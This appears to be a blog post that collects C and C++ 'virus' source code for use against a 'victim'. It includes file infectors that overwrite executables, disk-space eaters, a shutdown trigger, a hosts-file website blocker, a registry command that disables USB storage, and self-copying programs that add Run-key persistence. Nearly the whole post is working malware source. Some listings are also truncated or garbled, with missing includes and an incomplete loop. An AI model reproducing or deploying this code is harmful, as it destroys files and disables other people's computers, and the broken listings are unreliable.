If u r beginner in this field then don't play with ur computer becoz These viruses can corrupt and destroy your system file and h/w . So run and execute these viruses at own risk.........

VIRUS in C and C++ language

Infection with intenal copy virus in c lang.
 This virus when executed will infect all file on current directory of the computer on which it is run.

 Source code of the virus

/* VIRUS BY GAURAV GUPTA*/
#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
done = findfirst("*.*",&ffblk,0);
while (!done)
{ cprintf(" %s ", ffblk.ff_name);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}




library used in above virus :-
stdio.h
dos.h
dir.h
fcntl.h
conio.h
_____________________________________________________________________

Shutdown virus in c lang.
 This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll shutdown the system.

 Source code of the virus

#include
#include
void main(void)
{
system("shutdown -s");
}
_____________________________________________________________________

Unlimited folder creater virus in c lang.
 This virus when executed will create unlimited folder in current path of the computer on which it is run.

 Source code of the virus

#include
#include
void main()
{
char s[14]="md "; int man,i,j,k,l,m,n,o,p,q,r;
for(man=1;man<=10;man++)
{
for(i=65;i<122;i++)
{
s[3]=i;
s[4]=0;
if(man==1)
{
system(s);
continue;
}
for(j=65;j<122;j++)
{
s[4]=j;
s[5]=0;
if(man==2)
{
system(s);
continue;
}
for(k=65;k<122;k++)
{
s[5]=k;
s[6]=0;
if(man==3)
{
system(s);
continue;
}
for(l=65;l<122;l++)
{
s[6]=l;
s[7]=0;
if(man==4)
{
system(s);
continue;
}
for(m=65;m<122;m++)
{
s[7]=m;
s[8]=0;
if(man==5)
{
system(s);
continue;
}
for(n=65;n<122;n++)
{
s[8]=n;
s[9]=0;
if(man==6)
{
system(s);
continue;
}
for(o=65;o<122;o++)
{
s[9]=o;
s[10]=0;
if(man==7)
{
system(s);
continue;
}
for(p=65;p<122;p++)
{
s[10]=p;
s[11]=0;
if(man==8)
{
system(s);
continue;
}
for(q=65;q<122;q++)
{
s[11]=q;
s[12]=0;
if(man==9)
{
system(s);
continue;
}
for(r=65;r<122;r++)
{
s[12]=r;
s[13]=0;
if(man==10)
{
system(s);
continue;
}
}
}
}
}
}
}
}
}
}
}
}
}
_____________________________________________________________________

Websites blocker virus in c lang.
 You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking.
This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system.

 Source code of the virus



#include
#include
#include
char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
_____________________________________________________________________
Space eater virus in c lang.
This virus when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater virus.

 Source code of the virus

/* SPACE EATER VIRUS BY GAURAV GUPTA*/
#include
#include
#include
#include
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]=" ",choice;

void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);

void main()
{
draw();
delline();
findroot();
}


void draw()
{
clrscr();
}

void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
eatspace();
}
}
if(t==NULL)
{
getch();
exit(1);
}
exit(1);
}

void eatspace()
{

while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
vir_count=random(120);
draw();
break;
}
}
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}
_____________________________________________________________________

space eater-2 virus in c lang.
This virus when executed will eat up the hard disk space on the current drive of the computer on which it is run. I’ll call this as Space Eater-2 virus.


 Source code of the virus

/* SPACE EATER-2 VIRUS BY GAURAV GUPTA*/
#include
#include
void main()
{
while(1)
{
system("dir>>╚a.exe");
}
}
_____________________________


Disable USB ports virus in c lang.
It disables/blocks the USB ports on the computer (PC). Anyone with a basic knowledge of C language should be able to understand the working of this virus program. Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer.

source code

.#include
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");
}

You need to compile them before you can run it.

Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution .
To test this virus, just run the block_usb.exe file and insert a USB pen drive. Now you can see that your pen drive will never get detected .

_______________________________________________________________________________


FILE Overwrite virus-

source code


If you are interested then here is a code you can use to  overwrite  files in a system
#include
#include
#include

#define V_SIZE 7424

int n_inf=0;

void resume(void);
void inf(char *vir, char *filename);
int  compare(char *d, char *e);

void main(int argc, char **argv)
{
  struct ffblk fileinfo;
  char vir[V_SIZE];
  FILE *fp;
  char path[6];
  int b,a=0;

  argc++;

  if((fp=fopen(argv[0],"rb"))==NULL) resume();
  fread(vir,sizeof(char),V_SIZE,fp);
  fclose(fp);
 
  path[0]='*';
  path[1]='.';
  path[2]='E';
  path[3]='X';
  path[4]='E';
  path[5]=NULL;
 
  if(findfirst(path,&fileinfo,FA_ARCH)==-1) resume();
  inf(vir,fileinfo.ff_name);
  do {
    if(findnext(&fileinfo)!=0) a=1;
    else inf(vir,fileinfo.ff_name);
    if((a==1) || (n_inf>4)) b=1;
  } while (b!=1);
  resume();
}

void inf(char *vir, char *filename)
{
  FILE *fp;
  char checkinf[V_SIZE];

  if((fp=fopen(filename,"rb+"))==NULL) resume();
  fread(checkinf,sizeof(char),V_SIZE,fp);
  if(compare(vir,checkinf)==0) return;
  fseek(fp,0L,SEEK_SET);
  fwrite(vir,sizeof(char),V_SIZE,fp);
  fclose(fp);
  n_inf++;
}

int compare(char *d, char *e)
{
  int a;
 
  for(a=0;a
  return(0);
}

void resume(void)
{
  exit(0);

_____________________________________________________________

Infection through IP-

source code

#include
#include
#include
#include

struct in_addr *find_valid_host(void)
{
struct in_addr *address = (struct in_addr *)malloc(sizeof(struct in_addr));

srand(time(NULL)); /* on initialise le générateur aléatoire */
address->s_addr = rand();

while (!isup(*address))
(address->s_addr)++;
/* ici, on utilise la routine isup() de nmap pour voir si la cible est up */

return address;
}
_____________________________________________________

nippy virus-

source code


#include
#pragma comment(lib,"user32")
#pragma comment(lib,"shell32")

    LPDWORD br,bw;
    HGLOBAL Vir;
    LPVOID VirBlock;
    int virsize;
    char virname[MAX_PATH];
    char hostname[MAX_PATH];
    HINSTANCE kernel;
    FARPROC FileOpen,FileRead,FileWrite,FileClose,SetPointer;
   

int WINAPI WinMain(HINSTANCE hInstance,
                             HINSTANCE hPrevInstance,
                           LPSTR lpCmdLine,
                           int nCmdShow)

{
    WIN32_FIND_DATA fdata;
    HANDLE hfile;
    int fcount=1,no_more_files=1;
   
    kernel=LoadLibrary("kernel32.dll");
    FileOpen=GetProcAddress(kernel,"CreateFileA");
    FileRead=GetProcAddress(kernel,"ReadFile");
    FileWrite=GetProcAddress(kernel,"WriteFile");
    FileClose=GetProcAddress(kernel,"CloseHandle");
    SetPointer=GetProcAddress(kernel,"SetFilePointer");

    Payload();

    GetModuleFileName(NULL,virname,sizeof(virname));
    virsize=GetCompressedFileSize(virname,NULL);
    Vir=GlobalAlloc(GMEM_MOVEABLE,virsize);
    VirBlock=GlobalLock(Vir);

    hfile=CreateFile(virname,GENERIC_READ,
        FILE_SHARE_READ,
        0,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        0);
    FileRead(hfile,VirBlock,virsize,&br,0);

    FileClose(hfile);

    hfile=FindFirstFile("*.*",&fdata);
    while((no_more_files!=0) && (fcount!=5)){

            no_more_files=FindNextFile(hfile,&fdata);

            if(FindExecutable(fdata.cFileName,0,hostname)>32){

            if(isinfected(hostname)==FALSE){
               
                infect_file(hostname); 

                fcount+=1;   
            }
            }   
    }
   
    return 0;
}

int infect_file(LPSTR host){
    HANDLE hh;
    int sz;
    hh=FileOpen(host,GENERIC_WRITE+GENERIC_READ,
        FILE_SHARE_WRITE+FILE_SHARE_READ,
        0,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        0);
    sz=(int)GetCompressedFileSize(host,NULL);

    SetPointer(hh,0,0,FILE_BEGIN);
    FileWrite(hh,VirBlock,virsize,&bw,0);
    SetPointer(hh,0,0,FILE_END);
    FileWrite(hh,"NIPPY",5,&bw,0);

    FileClose(hh);

return 0;
}

int Payload(){
    MessageBox(NULL,"NIPPY\n\nWIRTTEN BY MOAPHIE\F-13 LABS","Nippy",MB_OK);
    return 0;
    }

BOOL isinfected(LPSTR host){
    int sz;
    LPDWORD br2;
    HANDLE hi;
    BYTE mark[5];

    hi=FileOpen(host,GENERIC_READ+GENERIC_WRITE,
        FILE_SHARE_READ+FILE_SHARE_WRITE,
        0,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        0);

    sz=(int)GetCompressedFileSize(host,NULL);


    SetPointer(hi,(sz-5),0,FILE_BEGIN);
    FileRead(hi,mark,5,&br2,0);
    mark[5]='\0';

    if(lstrcmp(mark,"NIPPY")==0)
        return TRUE;
    else
        return FALSE;   
   

    FileClose(hi);

}
_____________________________________________________________-

Other virus-

source code


#include windows.h
#include string.h

char windir[MAX_PATH];

int APIENTRY WinMain(HINSTANCE hInstance,
                              HINSTANCE hPrevInstance,
                              LPSTR lpCmdLine,
                              int nCmdShow)
{

char pathname[256];
HKEY hKey;


GetWindowsDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);

strcat(windir, "\\System32\\viral.exe");
CopyFile(pathname,windir,0);


unsigned char reg[10] = "infected";

RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey);
RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg));
RegCloseKey(hKey);

}

________________________________________________________


source code




#include windows.h

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
                            LPSTR lpszArgument, int nFunsterStil)

{

char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);


HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey);

HWND hWin;

hWin = FindWindow("Shell_TrayWnd",NULL);
EnableWindow(hWin,false);

while(1==1)
{
ShowWindow(hWin,false);
Sleep(1000);
ShowWindow(hWin,true);
Sleep(1000);
}

return 0;
}
____________________________________________________




Subscribe to: Posts (Atom)